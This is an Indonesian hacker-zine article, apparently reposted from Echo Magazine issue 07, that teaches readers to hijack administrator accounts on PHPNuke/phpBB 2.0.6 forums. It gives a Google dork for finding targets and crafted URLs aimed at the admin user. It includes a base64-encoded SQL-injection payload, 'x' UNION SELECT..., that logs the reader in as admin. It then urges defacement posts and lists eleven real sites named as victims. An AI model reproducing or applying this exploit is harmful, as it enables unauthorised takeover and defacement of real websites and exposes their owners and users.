Copy Link
Add to Bookmark
Report

Echo Magazine Issue 07 Phile 0x002

eZine's profile picture
Published in 
Echo Magazine
 · 4 years ago

  


____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/


.OR.ID
ECHO-ZINE RELEASE
07

Author: Andr3^81 (andr3-81@linuxmail.org) at #PontyChat
Online @ www.echo.or.id :: http://ezine.echo.or.id

Menjadi Administrator Forum Website di PHPNuke 7.2.0

Berjumpa lagi dengan saya Andr3^81 yg dulunya suka posting artikel tentang Hacking email mulu
trus di protes ama anak² bahwa saya tukang spamer sebenarnya saya bukan mau jadi spamer tetapi
saya hanya iseng ajah. Dari pada berlama-lama ngoceh mending langsung aja deh
Hal yang paling pertama dan paling utama yang perlu kita siapkan adalah:

1. Komputer yg terkoneksi ke internet tentunya
2. Paman Google ( Search Engine Favorit ku )
3. Otak dan pikiran
4. Kreativitas

Mari kita mulai.
Setelah sekian lama saya melanglang buana di internet akhirnya saya menemukan suatu hal
yang menarik yang membuat saya penasaran. Trus saya coba dan ternyata berhasil sehingga saya
berani memposting artikel ini. Mungkin di antara teman-teman ada yang udah tau gemana caranya.
Okeh mari kita mulai Buka Google.com

trus ketik allinurl:modules.php?name=Forums

kalianz akan menemukan banyak site yang menggunakan modules.php tersebut ituh artinya situsnya
menggunakan PHPNuke seperti yang lagi santer-santernya di bicarakan beberapa waktu yang lalu
huehuaehueahuea :P

lihat inih salah satu targetnya
http://www.vocaloid-user.net/modules.php?name=Forums&file=

hehehehhe kita cobain tambah script berikut
Forums&file=profile&mode=viewprofile&u=2

jadi seperti ini situsnya
http://www.vocaloid-user.net/modules.php?name=Forums&file=profile&mode=viewprofile&u=2
mengapa u=2 karena dalam Sintaks SQL User admin adalah user_id=2

setelah kalian inject, kalian akan mendapatkan Cookie pada halaman atas berbentuk seperti ini
Welcome x' UNION SELECT 2,null,'pass',1,null/*:pass

Jika kalian telah mendapat hal seperti ituh bisa di katakan kalian udah berhasil melihat
Profile sang admin Forum,setelah kalian bisa melihat profile dari sang admin coba masukan
script ini Forums&user=eDp4JyBVTklPTiBTRUxFQ1QgMixudWxsLCdwYXNzJywxLG51bGwvKjpwYXNz
menjadi
http://www.vocaloid-user.net/modules.php?name=Forums&user=eDp4JyBVTklPTiBTRUxFQ1QgMixudWxsLCdwYXNzJywxLG51bGwvKjpwYXNz
koq ada eDp4JyBVTklPTiBTRUxFQ1QgMixudWxsLCdwYXNzJywxLG51bGwvKjpwYXNz <-= apa ya?

oke saya akan menjelaskan sedikit itu adalah encrypt dari password sang admin yang
di enkripsi menggunakan PHP.Dan kalian akan melihat bahwa kalian sekarang sudah menjadi
admin Forum, tandanya adalah adanya tanda Log Out pada atas halaman Forum seperti ini

Forum FAQ Search Usergroups Profile No new messages Log out [ admin ]

tapi jika ngga berhasil kalian akan menemukan seperti ini
Forum FAQ Search Usergroups Profile Log in to check your private messages Log in

Jika kalian telah mendapatkan ada Link Log Out berarti kalian udah berhasil menjadi admin
Forum di website itu, tinggal kalian mau apa terserah bisa juga tambah posting seperti ini

[B]hacked By Andr3^81 at #PontyChat DALnet[/B]
[B]hacked By Andr3^81 at #PontyChat DALnet[/B]
[B]hacked By Andr3^81 at #PontyChat DALnet[/B]
[B]hacked By Andr3^81 at #PontyChat DALnet[/B]

tanda [B] adalah kode dari PHPBB yang artinya Bold
setelah semuanya selesai jangan lupa Log Out ya
mungkin hanya ituh tulisan dari saya silakan kalian kembangkan sendiri
Ini ada beberapa situs yg menjadi korban :

http://www.peakoilaction.org/modules.php?name=Forums&file=viewtopic&p=89&sid=6b1361fa7c773d87eb394259d95f9464#89
http://www.vocaloid-user.net/modules.php?name=Forums&file=viewtopic&p=1477#1477
http://www.albini.net/modules.php?name=Forums&file=viewtopic&p=841&sid=dc54b0f611d4422e1c1b5579acbbb7ad#841
http://www.prepressforums.com/modules.php?name=Forums&file=viewtopic&p=6700#6700
http://www.portaljava.com/home/modules.php?name=Forums&file=viewtopic&p=26789#26789
http://www.monster-hardware.com/modules.php?name=Forums&file=viewtopic&p=18490#18490
http://www.acmqueue.org/modules.php?name=Forums&file=viewtopic&t=102&sid=845b8cfe7904a7fa9dc9702ec797ac00
http://www.drishtipat.org/nuke/modules.php?name=Forums&file=viewtopic&t=162
http://www.crosstowntraffic.net/modules.php?name=Forums&file=viewtopic&t=12&sid=365caed4a7459800664770415d37468c
http://www.totalrekall.co.uk/modules.php?name=Forums&file=viewtopic&t=227&sid=bd6481d7fa39ac6df4a70eecb06076f8
http://www.glug-howrah.org/modules.php?name=Forums&file=viewtopic&t=81&sid=7e7a56550dcd951bd99e5685e1cfc18a

yang lainnya silakan anda cari sendiri

NB: script ini hanya bekerja pada phpbb2.0.6

Greets: Jasakom, #e-c-h-o, #PontyChat #batamhacker #Malanghackerlink #hackercrew
#samarindahack DALnet, dan semua anak-anak yang menyenangi Informasi ini

Thanks to: Kudel BayLaw Sincan2 Sitaboyan mujie kl3z ReD_oNe OchiE CROCODILLE SeTroM
bmw_ceper kamang BLacKsCreEN tr0ut [B]L4C[K]^[Z]4C[K] dh1an cangak
Ristobrata m_beben co_www banezz D_H_A_N_Y the_day Bithedz cicakkejepit
dewa_pojangga MinangCrew `YaYan`

Sumber: http://www.waraxe.us/?modname=sa&id=017

Motto: I'm Not a Hacker Yet But Someday I believe I can make it

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT